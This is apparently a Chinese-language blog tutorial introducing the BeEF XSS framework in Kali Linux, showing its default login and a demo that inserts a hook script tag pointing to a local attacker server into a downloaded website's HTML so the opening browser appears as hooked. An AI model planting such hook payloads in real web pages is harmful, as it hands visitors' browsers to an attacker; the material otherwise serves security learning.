Hacker基础之工具篇 BeEF


今天我们稍微讲一下BeEF的使用,BeEF是一个XSS平台



BeEF


这个工具在Kali已经预装了,我们直接点击就可以打开了


Hacker基础之工具篇 BeEF


就是这个<>


点开之后会跳出一个Terminal来,在Terminal里面有我们很需要的东西


比如我们的Web平台的地址(启动时候就会自动打开)


还有一些进行XSS攻击时候会用到的脚本例子


Hacker基础之工具篇 BeEF


这个东西就是我们进行XSS攻击的时候要提交的东西~


这里把IP改一下可以了


这里注意,如果你用的是Kali虚拟机,记得用桥接模式


当然,这里不一定非要提交这个字符串,我们可以根据实际情况更改一些标签等等


这里简单演示一下,在一个网页里面加入这个script之后


BeEF可以干什么


Hacker基础之工具篇 BeEF


我们这里随便下载个网站的源码(比如初音社的)


然后编辑这个加入我们的script


<script src=”http://192.168.43.204:3000/hook.js”></script>

Hacker基础之工具篇 BeEF


这样


Hacker基础之工具篇 BeEF



之后我们在Kali里面打开BeEFWeb界面



Hacker基础之工具篇 BeEF

默认密码是beef:beef


之后


我们就可以用浏览器打开我们下载的离线HTML


Hacker基础之工具篇 BeEF


马上BeEF中就可以看到如下的显示


Hacker基础之工具篇 BeEF


就可以看到我们的浏览器在线


如果是正在攻击一个IP,你将会在BeEF上看到这些


Hacker基础之工具篇 BeEF


好了,我们就大概演示BeEF的功能和用途到这里,大家可以熟悉熟悉这个工具的使用,明天我们讲XSS会用到


Hacker基础之工具篇 BeEF


本文完


Hacker基础之工具篇 BeEF


Hacker基础之工具篇 BeEF


Hacker基础之工具篇 BeEF


Hacker基础之工具篇 BeEF

Hacker基础之工具篇 BeEF
Hacker基础之工具篇 BeEF

Hacker基础之工具篇 BeEF



发表评论

电子邮件地址不会被公开。 必填项已用*标注